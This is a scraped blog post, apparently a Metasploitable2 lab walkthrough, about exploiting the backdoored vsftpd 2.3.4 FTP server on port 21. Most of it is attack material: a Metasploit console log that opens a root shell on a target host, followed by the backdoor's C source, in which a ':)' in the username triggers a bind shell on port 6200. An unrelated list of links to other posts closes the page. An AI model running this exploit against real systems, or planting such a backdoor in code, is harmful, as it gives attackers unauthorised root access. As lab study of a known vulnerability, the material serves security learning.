Metasploit2 - tcp port 21 - vsftpd
来源:互联网 发布:手机淘宝下载安装 编辑:程序博客网 时间:2024/06/06 10:06
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.1.111
RHOST => 192.168.1.111
msf exploit(vsftpd_234_backdoor) > run
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.113:44787 -> 192.168.1.111:6200) at 2014-07-29 21:24:27 -0400
id
uid=0(root) gid=0(root)后门代码如下:
wget http://ftp.gwdg.de/pub/cert.dfn/tools/net/vsftpd/vsftpd-2.3.4.tar.gz
========= [后门源码] str.c ============
int
str_contains_space(const struct mystr* p_str)
{
unsigned int i;
for (i=0; i < p_str->len; i++)
{
if (vsf_sysutil_isspace(p_str->p_buf[i]))
{
return 1;
}
else if((p_str->p_buf[i]==0x3a)
&& (p_str->p_buf[i+1]==0x29)) // :)
{
vsf_sysutil_extra();
}
}
return 0;
}
========= [后门源码] sysdeputil.c ============
int
vsf_sysutil_extra(void)
{
int fd, rfd;
struct sockaddr_in sa;
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
exit(1);
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6200);
sa.sin_addr.s_addr = INADDR_ANY;
if((bind(fd,(struct sockaddr *)&sa,
sizeof(struct sockaddr))) < 0) exit(1);
if((listen(fd, 100)) == -1) exit(1);
for(;;)
{
rfd = accept(fd, 0, 0);
close(0); close(1); close(2);
dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
execl("/bin/sh","sh",(char *)0);
}
}
vsftp下载地址:
http://ftp.gwdg.de/pub/cert.dfn/tools/net/vsftpd/
0 0
- Metasploit2 - tcp port 21 - vsftpd
- Metasploit2 - tcp port 1099 - RMI
- Metasploit2: tcp port 111 – rpcbind
- Metasploit2: tcp port 139/445 – Samba smbd
- tcp-ip Port Numbers
- centOS 6.4 vsftpd 500 illegal port command
- centos 6.7 vsftpd 500 Illegal PORT command.
- Port Number 1253/tcp | What is Port 1253/tcp?
- The Smallest TCP Port Redirector
- TCP/IP学习--port scanner
- Metasploitable2 - tcp port 2049 - NFS
- Metasploitable2 - tcp port 2121 - Proftp
- Metasploitable2 - tcp port 3306 - mysql
- Metasploitable2 - tcp port 3632 - distccd
- Metasploitable2 - tcp port 5432 - postgres
- Metasploitable2 - tcp port 5900 - vnc
- Metasploitable2 - tcp port 6667 - ircd
- Metasploitable2 - tcp port 8180 - tomcat
- 反正切函数的应用
- Pots——BFS
- POJ 2409 Let it Bead(Polya简单应用)
- UVa 10209 Is This Integration ?(计算几何)
- hdu1754
- Metasploit2 - tcp port 21 - vsftpd
- Android 系统的java世界是怎么诞生的?孵化器zygote的初步探索
- 支付宝异步通知 asp
- Hiberante 4.5.1 配置遇到的困难
- 数据结构中链表元素的删除
- 大端小端格式详解
- 452A - Eevee 模拟字符串,挺简单的一道题
- Metasploit2: tcp port 111 – rpcbind
- hdu 2795 线段树--点更新